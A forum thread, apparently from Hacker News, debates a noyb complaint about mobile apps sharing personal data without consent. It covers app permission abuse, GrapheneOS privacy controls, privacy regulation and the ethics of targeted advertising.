The worst I've had is a clock/weather widget that seemed to give you a choice of ads/no-ads, but if no-ads were chosen, it would make your phone part of a network of proxies (oxylabs) without telling you, in addition to transmitting location info (which it told you about). No payment option to get rid of ads/data selling. Only way I found out was by looking at requests it made using netguard.
Similarly, the default clock that came with my Xiaomi phone wanted permission to access my contacts before it would let me set an alarm. It did not get any such permission, I run an alternate clock/alarm app instead, and this will be the last Xiaomi phone I buy.
TBH that just sounds like bad design. The manufacturer could easily have granted that permission out of the box and you'd be none the wiser. A lot of built-in apps have permissions that can't be viewed by the user
The design worked for me! It highlighted a problem that I might want to be aware of when picking my next phone.
No, I don't want Google or whoever else to have their alarm app scanning my contacts for no good reason¹ either, and perhaps I can't stop it whoever is doing it, but given how many apps are locked onto that phone, how often it finds a reason to start one of them up, what perms they want, etc., I'm pretty sure I trust Xiaomi less. They probably have all my current data already anyway (I'm sure this phone is using more data than the previous one, though I've not dug into why yet, perhaps sending my info home is why), but hey ho…
My last phone was from Xiaomi too, but that was relatively stock Android (on the Android One program) so didn't have so much extra junk forced into it.
--
[1] they might have reason, I doubt I'd consider it good!
Google Apps generally have all permissions. GrapheneOS actually offers a sandboxed version of them that works like normal apps, and you can see how many permissions it is requesting.
Link doesn't explain why a built-in app would ask for permission to do anything. Eg as the sibling comment mentioned, Google apps often have full permissions by default and don't need to ask
I couldn't possibly link to the copious evidence online, anecdotal on this forum, high stakes data breaches, that personal data is being harvested by default en masse. It is true about the link, it was meant as nod to some at least scientific endeavour to investigate sharing.
> doesn't explain why a built-in app would ask for permission to do anything
> that personal data is being harvested by default en masse
You seem to be agreeing, at least to the point that a built-in app is usually granted permissions without requesting from the user. I think it would be more correct to say "bad implementation" instead of "bad design" but the point seems to make sense.
But ultimately it seems that you and OP both agree that this "bad implementation" (ask the user for permission instead of being granted by the OS) is the intended design (require unrelated permission for basic functionality).
> the default clock that came with my Xiaomi phone wanted permission to access my contacts
Unfortunately not surprising at all for Xiaomi, or any Chinese smartphone maker for that matter. Not that Korean or American Android phone makers like Samsung, Motorola, Google Pixel etc are privacy friendly, but Chinese smartphones are way worse.
I have to suspect they thought whoever was gullible enough to pay $3-6 a month for an alarm app would surely not care about their data going along with it.
Some of us think that if app developers who deliver good apps earn money from it, it will incentivize them to continue creating good apps.
But sometimes I feel myself slipping closer and closer to your much more cynical ideas.
In particular I remember donating what for me was a good chunk of money to Caddy right before they started "experimenting with business models" or whatever he called it. Same goes for happily paying WhatsApp, walking around like a living talking billboard for it only to have them sell out to Facebook shortly after.
"Greed is good" --Says the monkey with his hand trapped in a jar.
History has taught us that an enforced rule of law is the only way to prevent scammers from being the dominate players (by number, not size) in a market.
Negative. It ceases to be adaptive to be a cheater when cheaters exceed a certain percentage of the population. The advantage comes from information asymmetry.
Law makes cheating less adaptive. But even without law, cheats would not exceed some small minority.
The entire demographic in the data is willing to pay $3-6 a month for an alarm app. I'd sell the data too, they're probably hitting printer ink levels of valuation for it.
There is an alarm clock on iOS that used to be a 4 USD or something pay once that is now a monthly fee that I still use every day. It records your sleep sounds and wakes you up at a time when you're not in a deep sleep (you set a n minute wakeup window.)
They added ChatGPT and all sorts of other shit to it unfortunately but the core functionality is still good
You can't even buy your way out of it like people suggest. The fact that you want to do that signals you have money and makes your data even more valuable. Even companies that do not do this currently, assuming they are publicly traded, with eventual succumb. They just need a bad quarter or a few people needing to boost their metrics and they'll add the new revenue source.
I am really glad the era of the infuriating parrot line of "If you're not paying for it, you're the product" is coming to an end.
People try to justify everything they do and this is one the worst of them. Some even seemed to use this as an argument against open source which is usually free.
Along the same lines there is "What is your monetization plan?".
The next one I wish would go away is the "but they have a privacy policy" line of thinking. Like that means anything.
It's actually a bit trickier than I am about to present it, but: is it possible that you did not suspect that an "alarm clock" should need no Internet permissions?
I noticed that my Samsung phone the Clock app has "QUERY_ALL_PACKAGES". According to Google this is not a permitted use of QUERY_ALL_PACKAGES. F Google for not allowing user consent for this permission.
>Permitted uses involve apps that must discover any and all installed apps on the device, for awareness or interoperability purposes may have eligibility for the permission. Permitted uses include device search, antivirus apps, file managers, and browsers.
It's also bad for publishing (they now use the term too, anyways) all (I mean really like ALL of thoose tech savy people store their data in plaintext on someone computer, they not know what this thing does. there are many thousand on one instance. which disappears. maybe they where ethical people had no dirtmoney, couldn't exchange information to currency to pay the hoster.. I don't know. But you can get banned pretty quickly. Even when talking in private, a mod can decide it's creepy and ban you. they still have the data. you no access to your audience.
they are actually toots. it's an feature that other people can read what you say in private to someone and ban you if it's creepy (the conversation) besaid feature is active on all instances it's not opt out. no instance has an inhouse fix (think they would post about it, since people like to talk in private. I mean almost every human on earth does use e2ee but mastodon is such an (honestly? the devs are drunk or something really fishy going on there. they got funding and build an client (that is exactly what was NOT need or useable or their thing)) clusterfuck. it's to complecated they say. I know, ping me if you have same thought, it's easy to fix!
to most people YES, it pretty hard to grap DMs from twitters server. Especially compared to reading them in plaintext like on mastodon. you thing meta is not good but it's still e2ee so your better of writing there.
Long story short: There is nothing that actually prevents an installed app from collecting all your data.
Progressive Web Apps on the other hard are actively restricted by the browser sandbox and are ganerally a preferred solution from a privacy perspective.
GrapheneOS allows disabling network for a particular app, alongside the other permission settings. As a rule, I’ll give an app either file permissions or network permissions, but almost never both.
A lot of apps are perfectly usable without file access by sharing a file to them from the file manager.
GrapheneOS also has “Contact Scopes,” so you can grant an app contacts access (so it thinks) but it’s actually a subset or blank list of contacts.
Another feature that’s commonly recommended is using multiple profiles. I often see people use this to run Google apps in an environment isolated from the rest of their data.
I used to use sth like that too. Then a set of apps from a scummy telephony provider in my country showed me evidence of how they circumvent this.
Turned out, all apps from this vendor talked to each other, in the background. If one app has filesystem access but no network access, and another has network but no filesystem access, the former can upload private filesystem data by sending it through the latter.
How do apps utilize permissions of other apps? How does the filesystem app communicate with the network app if it does not have network privileges and other app has no filesystem privileges (ie there is no shared channel)?
Initial suspicion: Apps I had explicitly killed (equivalent to Force Stop) would start running. Most of these apps had no background services (or any reason to run in the background) and no notifications to show either. But they did have one thing in common: the vendor.
Further suspicion: Apps remain killed, for long periods of time, if I don't start any of them.
Quick test: Kill all apps. Start them one by one. Check if other apps are now running.
Confirmation: Pull APKs from device; RE their code for IPC.
You’ve given me something to think about. Luckily, I only have to amend my mental model a bit, to assume giving a permission to any vendor’s app is to give that permission to every app from that vendor. In most cases where that would be a problem, I already run such apps under a separate user profile, which fully prevents IPC.
> GrapheneOS allows disabling network for a particular app, alongside the other permission settings.
This feature is also useful in LineageOS, as a kind of native firewall. Thankfully most open source apps on my device don't use network connectivity so the permission is greyed out to begin with.
Sorry, I just checked the "Advanced Privacy" settings, but I see nothing about restricting network access for a particular app. I'd be very interested in that feature though - do you have more pointers how exactly to restrict a single app?
My DivestOS features both the GrapheneOS and LineageOS implementation, and I document the former as block and the latter as "data restriction" (eg. to simply block over cellular) as it cannot guarantee a real block.
I recommend using a separate profile for apps you may want that require Google Services. GrapheneOS is perfect for this.
My separate profile is called "Burner" which serves as a handy reminder to me that I may, at some point, wipe out the whole profile and every app therein.
That would be nice. Android has a wealth of phones with features, but the Pixel line is missing some I would consider “required”— not mention they aren’t available in my country.
On Graphene, if you deny network access to the sandboxed Play Services, it cannot transmit data to Google. But does Play Services cache all that privacy-invasive data, so that if you switch on network access at some point in the future, Play Services will upload it as soon as it gets a chance? If so, seems like a failure of GrapheneOS's model.
Yes, if the worry is that an app could offload data via the network, then turning off the network only provides a privacy benefit if the network stays off. That’s why the recommendation is to run Google apps in an isolated user profile, so they have no opportunity to collect data in the first place.
But even under an isolated profile, wouldn’t Play Services still have access to your IMEI, phone number, location and sensor data? That would seem to completely deanonymize the user regardless, if not to the app developer than at least to Google.
According to the GrapheneOS FAQ: “As of Android 10, apps cannot obtain permission to access non-resettable hardware identifiers such as the serial number, MAC addresses, IMEIs/MEIDs, SIM card serial numbers and subscriber IDs.”
> phone number
I don’t think it has access to this.
> location
You can turn off location permissions. Spoofing location (so the app doesn’t know it has no permission) is a planned feature but with no ETA.
> sensor data
You can turn off sensor permissions alongside other app permissions. This is another toggle present in GrapheneOS but not stock Android.
As much as I'd love to run GrapheneOS—and in the context of the original post—I just can't bring myself to willingly give the Google ad-machine my money. I keep hoping another manufacturer will step up and drive support for their devices.
Users cannot change the system webview, Android only allows pre-included ones as it gets directly loaded into the process space of all apps using the WebView widget.
And it still makes many connections to Google and includes proprietary Google binaries and downloads more at runtime: https://divestos.org/misc/e.txt
Thanks, I should take a look. I've also been meaning to try DivestOS.
I'm certainly not holding my breath on more GrapheneOS support, as so few people care. I'm not entirely sure it'd be the right fit for me anyway. I'm currently using a microg setup with lsposed so I can patch out some junk in modern apps (like Outlook trying to be device admin), and this kind of hooking is not something GrapheneOS is interested in (a feature request I opened a while back: https://github.com/GrapheneOS/os-issue-tracker/issues/284).
Except the only difference is that PWAs in Chrome's "sandbox" just collect data for Google, and Google alone. Do you believe they do it for the greater good?
Google probably gets data both within the sandbox and outside the sandbox. But outside the sandbox, probably so do parties with worse privacy practices than Google, such as actually selling your data instead of just letting their internal ad systems use your data so that advertisers can reach you with targeted ads, or such as not letting you as effectively delete your data as Google does.
(Disclosure: I have worked for Google in the past, but not for over 8 years, and I’m certainly not speaking for them here. My Google job never included anything relevant to this comment, except doing roughly 1-2 years of standard SRE/devops/sysadmin work for a now-decommissioned acquired product in the publisher-side display ads yield management space, ending roughly a decade ago.)
> just letting their internal ad systems use your data so that advertisers can reach you with targeted ads
Your distancing yourself from your former employer's practices is appreciated but Google monopolizing click and all other web usage data isn't any better than keeping those for themselves from an antitrust PoV (as opposed to selling the data under FRAND terms).
There's no way around taking Chrome development and monopoly influence on web standardization away from Google as one outcome of ongoing antitrust lawsuits.
> Your distancing yourself from your former employer's practices is appreciated but Google monopolizing click and all other web usage data isn't any better than keeping those for themselves from an antitrust PoV (as opposed to selling the data under FRAND terms).
I’m comparing practices from the perspective of privacy, not antitrust, since that is the frame in which we were discussing, and with which the original submitted NOYB article was concerned.
I don’t like monopoly power in the advertising industry any more than you do, and Google is not an exception to that. But I don’t want the fix to any Google advertising monopoly to be forcing them to share user data on FRAND terms. Not only would that likely violate privacy law in Europe and elsewhere in the world, it would reduce my data’s privacy protections to what results from the worst privacy practices among anyone who buys the data from Google. Yes, that’s far worse than what Google currently does.
> There's no way around taking Chrome development and monopoly influence on web standardization away from Google as one outcome of ongoing antitrust lawsuits.
If authorities like those in Europe or the US decide that antitrust violations by Google warrant those remedies, I have no personal objection. But I would object to any anti-monopoly measures that effectively destroy the privacy of the profile Google has built on me, such as mandatory FRAND licensing of that data. At least I can delete the data when it’s just the one data custodian, and one which properly implements and tests data deletion process more than many companies.
This is why I don't use default Chrome or stock Androud. They're both apps from a known privacy invader.
But even if you do, these are restricted from wholesale collection of data like your contacts by marketplace and public relations pressures and concerns that smaller junk app vendors don't have.
e/OS and Brave browser. I generally avoid Google's Play store and install most apps from Aurora and F-Droid. Aurora provides a privacy report that you can review before installing an app.
> There is nothing that actually prevents an installed app from collecting all your data.
Uhm, false? Unless by "all your data" refers to "what you do in the app" + IP address + phone model, on the iPhone nothing else is accessible by default. All that info is also available to any website you visit, so PWAs are not special in this regard.
The easiest way for a bad actor to get access to personal data on iPhone or Android is to simply ask for it --- create a junk installed app with some quasi-plausible excuse for requesting it. There is no restriction on what can be done with the data once the request is granted.
Granting a random app access to all your private data after they request access is very different than "There is nothing that actually prevents an installed app from collecting all your data."
I think the only sensitive APIs not available in the browser are calendar and photo gallery access, but PWAs have otherwise access to Contacts, GeoLocation, Cameras, Microphone, Clipboard, and even the FileSystem.
Maybe Android apps do suffer from the problem you’re describing, since permissions are granted lumped together at install time, but on iOS all permissions are optional just like in the browser.
The only reason stuff like PiHole / AdGuard DNS and many others work is because the service vendors have not bothered unifying ALL the network requests their service needs under a single domain. The one and only reason we can use those privacy-enhancing solutions is because the vendors are sloppy.
The moment your favorite app starts using only `your-fav-app.com` domain for everything, ads and sending out your private info included, you are toast and you'll need a MITM proxy or any other on-device-network-payload-inspector-after-decryption-has-taken-place to save yourself. (So maybe Adguard's client app, I presume? But haven't ever tried.)
Maybe Privaxy[0] will help -- haven't tried it yet and I got no time and energy for it for the moment, sadly, but DNS-level blocking in particular is just waiting for a few more resourceful vendors to do the right thing for their interests, and we're disarmed.
Your data can easily be sent to an IP collection point that is not on AdGuard's list. DNS blockers are better than nothing --- which is a pretty low bar and easy to jump over.
That research was conducted on the 2018 version of the OS, and also at a time when Google Play's distribution agreement was much more relaxed (close to zero app checks).
As far as I know, most (if not all) of the concerns shared have been addressed in the following 2 years, so I would assume that this is not an issue anymore in 2023 - or at least not as severe. I believe that new loopholes exist, but this one seems outdated to me.
The data described in that article (Eg MAC Address) has virtually zero overlap with the kind of data GP mentioned (contact list, gallery). Most people only care about the latter.
btw "The researchers discovered that the Shutterfly app was accessing the location tags of photos' EXIF metadata. All that's required is the READ_EXTERNAL_STORAGE permission" sounds ridiculous. If you grant permission to read entire files, of course the app can read metadata.
> These complaints are just the beginning: noyb is planning to file more complaints against mobile app companies in the future in order to stop the illegal sharing of user data.
Gotta love what noyb is doing. In case you want to support their work, there are links on their website to donate or to become a member. I'm not affiliated with them in any way, but their approach to privacy law enforcement is precisely what we need right now. Companies that mis-use personal data (often in violation of European law) must know that there can be consequences (reputational, financial and potentially legal).
It's good work. Ultimately though we cannot base civic cybersecurity
for the entire population on groups like NOYB or any number of
vigilante policemen exposing malevolent companies one by one. It's
neither scalable nor sustainable against a tide of technological abuse
enabled by a culture of corporate entitlement and public apathy.
In addition to legislation the problem requires active programmes of
public education and information as is the case for all other public
health or security issues.
More lives are saved per dollar running a "Don't drink-drive" campaign
than giving police money to arrest drunk drivers.
"Don't install that app" should be a tag-line every mother and child
knows, like "See it. Say it. Sorted.", just to get people to pause and
think... "would I share all my all my personal data and access to my
life with a random total stranger?" Because that's what you're doing
when you install some dodgy app at a restaurant.
Maybe groups like NOYB could do more work on sophisticated modern
influential media to attack the root cause of the problem: a
fundamentally flawed security model with a set of wholly inappropriate
assumptions.
Doctors and lawyers and possibly other schools have to take courses in ethics, and then can loose their license to practice for ethical violations. We should impose the same for software. Each company that produces software for public use should be issued a license to operate. If the company is found guilty of violating the ethics of that license, they lose the license. That means their software is now no longer legal to sell.
That is a wild overreaction! If there's a legal consensus nobody is going to violate that. Even the huge companies that get vilified on here spend millions trying to comply with all the various jurisdictions' rules. Different parts of the EU can't even agree on how to interpret their own laws yet.
Licensure tends to be a protective mechanism to keep salaries high. If that's your goal, great, but it's a weird hammer to apply to fix your subjective opinion of what's ethical.
>If there's a legal consensus nobody is going to violate that.
Talking about wild speculation! Shall we have a look at all of the laws and the companies that break them that have only received slap on the wrist level fines? So clearly, there are some sort of regulations, otherwise, how would these fines be imposed? If there were no violations of those regulations, why are fines being imposed. So, your "nobody going to violate that" is already starting the conversation on shaky ground
This is analogous to solving murder by telling everyone to stay home since serial killers run free on the street instead of catching & jailing murderers.
Maybe we could enforce the (existing!) laws against malware, fraud, spam, etc so that people can continue to install apps & use them and be confident knowing that nothing bad will happen, and if it does happen then the offenders will be punished appropriately?
GDPR breaches aren't limited to apps btw, it happens on websites and even in real life (Tesco stores in the UK for example have a notice inside the store about data collection; presumably they're doing Bluetooth/Wi-Fi MAC address tracking - by the time you read the notice you're already being stalked, and there's no way to opt-out other than inconveniencing yourself by manually toggling the relevant radios before going to the store).
> analogous to solving murder by telling everyone to stay home since
serial killers run free on the street.
You're advocating an extreme measure (locking yourself at home) in
response to a practically non-existent threat ("serial killers" do not
roam the streets looking for random victims except in Hollywood
plots). OTOH the chance of an average person being scammed by
corporate data thieves seems less than one in ten, as a total guess.
So surely you see you're making a disingenuous analogy.
Education is a very powerful weapon against the criminality of
Surveillance Capitalism. And it's flexible; people can choose a range
of responses, from pausing before installing a new app, to getting rid
of their smartphone and choosing a better lifestyle.
I meant this in a hypothetical world where we'd "solve" murder by letting murderers walk free and telling people to hide at home (your proposed approach to solving GDPR breaches) instead of applying the law and jailing them.
Informing people only helps if they have a choice whether or not to use the app/service.
In many cases, people are tracked by services they cannot really avoid. One example is the German "Deutsche Bahn" app, which is full of trackers. Some organizations are now trying to fight this using legal means. Another example was the Covid vaccine registration page in my canton in Switzerland, where Google Analytics was being used (right on the page with my sensitive medical information). It wasn't even being mentioned in the privacy policy.
We have laws that say what's legal and what's illegal. If something is illegal, those laws should be enforced. Especially when users have no choice.
> Informing people only helps if they have a choice whether or not to use the app/service.
People always have a choice. Blinded by comfort, convenience and
other "first world problems" they may not immediately recognise it as
a choice, but by historical standards they absolutely always have one.
> No Consent. Under the ePrivacy Directive, the mere access or storage of data on the user’s terminal device is only allowed if users give their free, informed, specific and unambiguous consent. Two out of the three mobile apps did not display a consent banner when launching the app. The third app presented a banner that theoretically gave the complainant the choice of giving or withholding their consent. In reality, the transmission of their personal data began without any interaction on their part – and before they even had a chance to think about consent.
Why do nobody question the fact that it is possible for an application to access data without user consent to begin with? Why are we transforming it into a human problem? The tech is to blame.
Google is an advertising company and it's not in their interest.
It's absolutely technically viable to build an app store that incentivizes using the minimum amount of permissions possible, or to even feed fake data to overly nosy apps. In fact it's been done, but it'll be a cold day in hell before Google makes it easy.
Very few companies/programmers I know write 'secure first'. Most of the time it's "this shit isn't working, turn off the security stuff and see if it works then we'll re-enable it later"
What app developers want/do is irrelevant. I am saying that it should be impossible for any individual app to access or connect to anything without explicit user consent.
We need to stop automating everything and then complain that companies aren't putting optional banners everywhere. This is beyond stupid.
For what it's worth, the opinion isn't universal. As a user I like the Haiku approach of not even having "user accounts" and on Linux I have 'sudo nopasswd ALL' on. Coddling everyone and sandboxing everything without any options to get that stuff out of the way isn't acceptable to me. Security or even privacy aren't always my top priority, and I should have that freedom available to me, even if you want the option not to have it.
The reality is there are two operating systems for mobile devices for >99% of the population.
The reality is many applications developed for those devices try to harvest data from the user, often without their consent. Contact details, location data, correlation to other apps installed, and so on, in order to make money.
The reality is that this is unethical without explicit consent, and nothing will stop these actors except technical barriers to this malicious activity.
Your desire to sleep in your apartment with the windows open and doors unlocked and cameras off is yours, but if there is a binary decision of "have these protections or not", the answer is clear.
Personally I am not advocating for "protection", protection against what? Your own device? Why is your device harming you to begin with?
The online data privacy crisis isn't really about data or the bad actors, but the lack of understandability and control over our own electronics.
To solve the problem you need to make users more involved, remove automation in favor of manual processes but simplified as much as possible. "Protections" are mostly band-aid hiding the real cause.
Seatbelts don't need to be worn by good drivers, because they won't get into accidents!
>protection against ... your own device? Why is your device harming you to begin with?
Yes. Because some apps do more than they claim to do, and users are unaware, and thinking that all citizens can be perfectly informed and thus do not need to put guardrails on app permissions is foolish.
>but the lack of understandability and control over our own electronics.
The lack of control over the data that can be extracted by bad actors that seem like good actors.
>"Protections" are mostly band-aid hiding the real cause.
The real cause is that humans can be malicious, others can be fooled, and the first goes after the second.
> Seatbelts don't need to be worn by good drivers, because they won't get into accidents!
All humans are fallible, but it may be out of your control. There is no other human between you and your device.
> Yes. Because some apps do more than they claim to do, and users are unaware, and thinking that all citizens can be perfectly informed and thus do not need to put guardrails on app permissions is foolish.
Why do you even have to trust what apps say? That's my problem with this reasoning, we are under the assumption that programs control your device and that nothing can be done about it except adding warnings. Why do programs need instructions to access data? How about forcing the user to plug any environment access into the app? Anything that isn't plugged cannot be accessed, no trust required.
> The lack of control over the data that can be extracted by bad actors that seem like good actors.
The solution is to give control over the data, not with protection, but understanding. You are transforming this tech problem into a human problem.
> The real cause is that humans can be malicious, others can be fooled, and the first goes after the second.
Again no human between you and your device/program. We however decided that software can be malicious.
It is easier to build automation on top of a simpler/manual/secure process, than it is to make a fully automated system secure.
I am not saying that automation shouldn't be possible at all, but that platforms shouldn't be designed this way.
If users had to consent to contact access, socket connection, and every single packet sent (obviously they would need to become readable to layman) there would be way less demand for data privacy laws.
That's understandable, and so perhaps that we need to re-think our computing model to replace yes/no popups with something a bit more involving.
By "involving" I do not necessarily mean harder, the goal isn't to make computers less accessible, but if we give users the ability to control whatever go in and out their devices maybe that making them a bit more interactive so instead of clicking "yes" to allow keyboard access you could drag a keyboard icon to the app or any other device you want to use as input instead.
Consent doesn't need to be presented as yes/no, there are multiple ways to make users understand what is being accessed.
There are but anything that requires decisions, individual separate decisions, every time will induce fatigue. Addressing that problem isn’t going to happen by changing the ui presented at each individual interaction, it happens by finding a way to make the vast majority of those decisions ahead by stating your personal default, then overriding it as necessary. A process that can be done once, or occasionally, and applied 100 times can be involved and still be worthwhile. Making it involved and repeated ad nauseam is a good way to ensure nobody will actually bother every time.
There is also a problem with how apps are made, they depend way too much on environment calls. And obviously adding 50 permissions isn't realistic.
Now, making the base process manual doesn't mean that the user will need to do the same thing over and over. I am not against automation, but I believe that it should come from the user, not a fancy system that some external entity decided is the best way to handle permission.
By outsourcing the responsibility to your data, you are effectively giving up on understanding it.
Ideally, I believe that consumer computers should become interactive/programmable systems where the OS is responsible for exposing all the environment calls, and the apps all stateless functions. The process of mapping environment access to app is manual, but create consent AND customizability. Plus additional benefits like easing the development of cross-platform applications and maintainability.
Of course the personal data needs to be transmitted prior to interaction! How else could we send the "consent-banner-displayed" event to Google Analytics to know if it's working?!
Ten years ago digital privacy advocates had a tough job. The fact that they still do today, is one of the most glaring governance failures of recent times.
Governments just can't seem to get their act together on this. Its pointless to revisit the spectrum of reasons ranging from incompetency to complicity. If you want a populist framing this is like knowingly lowering the gates of the castle and letting expert pickpockets rush in and have a field day with the unsuspecting citizens.
Maybe stressing that this inaction undermines the future of the digital economy and society would fly better with the political class. Digitization is our bright "future", no?
Economic actors will act according to the signals they get from government and its institutions as to what is allowed. If those signals are non-existing or mixed they will invest in the "wrong" direction.
"Such extensive data collection allows the profiling of users in order to show them personalized ads and marketing campaigns to increase the revenue for the mentioned companies."
On a bit of a philosophical tangent: Targeted ads increase revenues because they are focused on people with a higher proabability of responding positively to the ads. If you asume agency of the user then this is a good thing, a win-win. But by treating this negatively you are asuming that the user has no agency over their actions. They reply to the ad, but it hurts them or they don't really want to. And we should protect users from this "temptation". This is the line of reasoning behind banning the sale of addictive substances to minors.
Note that I am not talking about privacy issues, only about the quoted reservation which is quite common.
Another philosophical tangent: we should protect humans from advertising on principle.
Our minds are sacred, our cognitive functions are inalienable. Not a single corporation on this planet is entitled to this. Our attention belongs to us. It's not currency to pay for services with. It's not a commodity for them to sell to the highest bidder. They don't get to insert their brands into our brains without our consent. That should be considered mind rape and any measures taken to stop it should be considered legitimate self-defense.
I’ve spent some time thinking about this. A lot of things in life can be avoided if you have more money. Waiting in long lines, having uncomfortable seats, doing regular chores, etc.
But it seems advertising can’t be completely avoided (as much as I’d like it to). I’ll go out of my way to spend money wherever it removes ads (eg YouTube, podcasts, etc), but no amount of money will remove the billboards I have to drive by on the way to work. I’ll never be able to go to a sports event without advertisers bidding for my attention.
You would think at least some of those issues could be avoided by living somewhere “more expensive”, but it seems like affluent areas actually have more ads.
What measures can we possibly take?
Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
The number one example is of course uBlock Origin. It shows people a better world with no strings attached. So good it should be built into browsers. It can't block ads in videos... Yet. How long until someone makes an AI video filterer that deletes ads from video streams though? Have the AI watch ads so we don't have to. Given this technology, how long until augmented reality glasses with adblocking builtin start showing up?
> You would think at least some of those issues could be avoided by living somewhere “more expensive”, but it seems like affluent areas actually have more ads.
For whatever reason there are no (or very few) billboards in Northern Virginia, so that's one option. I wish there were more places like that, it's so refreshing driving through and not being bombarded with ads fighting for my attention (which is supposed to be on the road...).
But in general I think you're right it's extremely hard to get away from. I think the main reason it's hard to "buy out" of advertising it that the very fact that you can afford to "buy out" makes you that much more valuable to advertisers.
> Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
In case you visit again or it comes up for others, you should be able to push the second button from the top on the left to mute the video.
> no amount of money will remove the billboards I have to drive by on the way to work. I’ll never be able to go to a sports event without advertisers bidding for my attention
I don't want to be too pedantic, but it's worth noting that having a substantial amount of money can indeed resolve this issue.
For instance, being chauffeured means you don't have to pay any attention to the road unless you choose to do so.
Moreover, ad-free services like NFL Red Zone are available, or to your point about attending a sporting event with sufficient wealth having a private box can insulate you from 99% of sports event advertising.
> Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
On most of these pumps you can push the second to top button on the right side of the screen to mute the ad.
According to the guy that owns the gas station down the street from me, this gets tracked and if the owner/advertisers see that enough people are muting the ads and they're not profitable, they'll stop paying to have them play at the pumps.
> it seems like affluent areas actually have more ads
Are you talking about cities? Most affluent people in the US live in quiet suburbs
> I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas
I've lived in the US for most of my life and I've never seen anything like that. You gotta specify what part of the US you're talking about because that's a very weird thing for you to assume is common
"They don't get to insert their brands into our brains without our consent."
You consent by going to free youtube.
Big ads in cities are more difficult to avoid, but then again, someone wearing a sports shirt of his favourite soccer club is doing advertisement. Someone wearing a cross for his religion, etc.
I don't think drawing a arbitary line and saying "this is mindrape" and "this is legit" is really working.
That being said, I do want to paintball big ads and alike.
> Big ads in cities are more difficult to avoid, but then again, someone wearing a sports shirt of his favourite soccer club is doing advertisement. Someone wearing a cross for his religion, etc.
Yeah, but those give more room for consent than something like a youtube ad.
You passively see those advertisements while doing something else. When you see a television or youtube ad, your full attention is much more likely on the computer and on that ad.
Tell that to the people who need to watch a YouTube video and don't want to punch in their credit-card info. Unless someone is picking up the hosting and delivery costs, advertising will always make the most sense.
Now, don't get me wrong; ad-free YouTube at no cost would be great! It's not a business though, and without advertising arguably none of those services would exist. I don't know what you are proposing if not completely tearing-down our relatively accessible status-quo.
I would completely tear down the ad-driven status quo in favour of people paying for things. People shouldn't have to punch in their credit card info to access a youtube video and they shouldn't need to sign up for a subscription to youtube or any other site in order to access individual pieces of information. Payment should be only for content consumed and should be frictionless and consistent across all providers.
It's a pipe dream now, with the exploitative business models and consumer addictions well established, but there's an alternative history of the internet where this could have happened.
I'd view extreme poverty as a problem for the state rather than advertisers, universal basic income (UBI) being one obvious approach, and access to information for those too poor to pay for it as a challenge that has been long addressed by public libraries. Solving these problems is neither an explicit goal of adverts nor something they achieve well as a side effect.
Customers have this expectation because VCs paid for growth. Then for another decade or so Google continued to give it away. Is it any wonder many people have a clear misunderstanding of the costs of software?
>Nobody "needs" to watch a YouTube video. Maybe they want to watch one.
Youtube's giant selection of people demonstrating every DIY repair topic (car repair, appliance repair, iPhone battery replace, etc) you can think of -- that's available nowhere else -- has literally saved me thousands of dollars (no exaggeration).
I guess one could twist that into "you didn't really _need_ to save thousands of dollar$, you just _wanted_ to."
Youtube is much more than frivolous music videos and you're too dismissive of how it helps people.
EDIT REPLY TO: "Doesn't justify their advertising."
I wasn't responding to the advertising business model. My issue was the "nobody _needs_ to watch a Youtube video" is way too dismissive.
>There's always other sources of information. There's always better sources of information.
Not always. Last week, I needed to replace an oxygen sensor on my truck and wanted some guidance on how to do it. Yes, a pdf of a vehicle service manual has diagrams etc but that book doesn't show a video of someone actually doing it. I need to see somebody actually put a wrench on the the bolts and unplug the sensor cable. I watched 5 different mechanics do it and I'm glad I did because there are some tricky issues that my inexperience would not have solved on my own. Vimeo and other video services didn't have this car repair content. Only Youtube.
YouTube videos have helped me a lot as well. Doesn't justify their advertising. There's always other sources of information. There's always better sources of information. I make it a point to read books now. Libraries should be valued.
> "Need" is too strong a word. Nobody "needs" to watch a YouTube video.
Circumstantially, maybe not. In high school and college, I had plenty of homework assignments that involved a YouTube video. After classes, YouTube continued to be the biggest asset to my professional development. Having access to conference talks and long-form tutorials changed my life.
For the sake of argument, let's just say I'm fixing my sink and the first result on 5 search engines is a YouTube video. What do you expect the average person to do next?
> It's exactly what I am proposing.
Well, good luck with that. I'm very curious to see who shows up to pick up the bill in your new world. It sorta sounds like your mental model feigns the existence of capitalism and free will, though.
> I'm very curious to see who shows up to pick up the bill in your new world.
I will pick up the bill for my own consumption. I have less than zero tolerance for advertising but I still buy a lot of stuff. The difference is I do it on my own terms. I won't have them actively advertising to me. When I want something, I'll ask them. When I actively seek out their products it's not advertising but information.
Side note : I consider adverstising to be like a friend's recommendation if the options are curated, researched and non-scammy. If you have nothing against influencer economy, you should have nothing against advertising. I just want ads to be done ethically.
My (actual) friends have never spent a single dime in recommending a product to me, and they never talk about products where they have a personal stake. So I can't relate to your perception.
Advertisers spend money with the aim of convincing strangers. There is always a conflict of interest.
Ads have suggested lot of life improvement products for me i.e. better bedsheets, duvets, aromatherapy products, etc. I love those. I would have never checked those out. After trying them, I have suggested them to my friends. Lot of minor improvements. Here's the thesis, if we consider youtube recommendations and instagram recommendations to be so good that they are addictive, the same can be said about ad recommendations. Buy-conversions track whether the product has been effective and could be recommended to similar demographics. People have no problem choosing life-partners based on how algos recommends profiles on dating apps but they have issue with ads. They want this particular aspect to be "organic" what a irony.
Well the point of internet is provide abundance to everyone at every price point and product category. Initially it was only about information and now it is about good products and services. Ads help in that. Not every small niche product has physical store in every city or has an app, listing on Amazon doesn't properly convey the worth of their products to new buyers. Physically seeing products is not necessary because you can always return it if not satisfied.
Consider another area where recommendation results in ecommerce like activity. Food delivery apps. One could say why not visit the restaurant and eat there. Through delivery apps, I come to know about new items / cuisines, restaurants, their reviews and buy them. In fact the situation is far more worse in delivery apps because you can't return a food item once tasted. Not so with other category of products like clothings, etc.
I feel like Benedicts Evans should make a primer on why ads exists and how better ads could serve society.
Ads help in that by selling my attention to corporations. I think that's a violation of my boundaries and will resist it by any means possible.
> Through delivery apps, I come to know about new items / cuisines, restaurants, their reviews and buy them.
